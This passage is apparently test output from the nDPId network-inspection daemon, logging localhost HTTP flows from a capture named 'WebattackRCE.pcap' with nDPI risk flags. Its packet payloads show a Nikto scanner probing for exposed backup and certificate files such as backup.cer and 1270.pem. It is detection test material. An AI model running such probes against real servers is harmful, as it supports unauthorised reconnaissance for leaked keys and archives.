00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277031,"pkt":"AAAAAAAAAAAAAAAACABFAADASFpAAEAG89t\/AAABfwAAAcNYH5CIKHAy4FE5l4AYAED+tAAAAQEICp1m\/E+dZvxPR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277032,"pkt":"AAAAAAAAAAAAAAAACABFAAC9MI5AAEAGC6t\/AAABfwAAAcNaH5DGiQjnE8I6SoAYAED+sQAAAQEICp1m\/FCdZvxQR0VUIC8wLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277033,"pkt":"AAAAAAAAAAAAAAAACABFAAC9R6NAAEAG9JV\/AAABfwAAAcNcH5BSP3\/MbAOkN4AYAED+sQAAAQEICp1m\/FGdZvxRR0VUIC8wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277034,"pkt":"AAAAAAAAAAAAAAAACABFAADCi6hAAEAGsIt\/AAABfwAAAcNeH5CrCbPNtCCkdYAYAED+tgAAAQEICp1m\/FKdZvxSR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277036,"pkt":"AAAAAAAAAAAAAAAACABFAADCaYNAAEAG0rB\/AAABfwAAAcNgH5BETFHrIT\/7L4AYAED+tgAAAQEICp1m\/FSdZvxUR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277037,"pkt":"AAAAAAAAAAAAAAAACABFAADByHVAAEAGc79\/AAABfwAAAcNiH5AsIfAZ9PZ+lIAYAED+tQAAAQEICp1m\/FWdZvxVR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":237,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277037,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277040,"pkt":"AAAAAAAAAAAAAAAACABFAADBLYNAAEAGDrJ\/AAABfwAAAcNkH5B8OhXu0\/0OtIAYAED+tQAAAQEICp1m\/FidZvxXR0VUIC8xMjcwMC5jZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277040,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277041,"pkt":"AAAAAAAAAAAAAAAACABFAADJ0PZAAEAGazZ\/AAABfwAAAcNmH5D3m+iZ0R8Y8oAYAED+vQAAAQEICp1m\/FmdZvxZR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":239,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277041,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420277042,"pkt":"AAAAAAAAAAAAAAAACABFAADJPvJAAEAG\/Tp\/AAABfwAAAcNoH5CMHAadHXRwyoAYAED+vQAAAQEICp1m\/FqdZvxaR0VUIC8xMjdfMF8wXzEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":240,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277042,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277044,"pkt":"AAAAAAAAAAAAAAAACABFAADCjwZAAEAGrS1\/AAABfwAAAcNqH5Br7rdq4TxVq4AYAED+tgAAAQEICp1m\/FydZvxcR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":241,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277044,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277045,"pkt":"AAAAAAAAAAAAAAAACABFAADCv9RAAEAGfF9\/AAABfwAAAcNsH5AFEofAoVDNroAYAED+tgAAAQEICp1m\/F2dZvxdR0VUIC8xMjcwMDEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":242,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277045,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":243,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277046,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
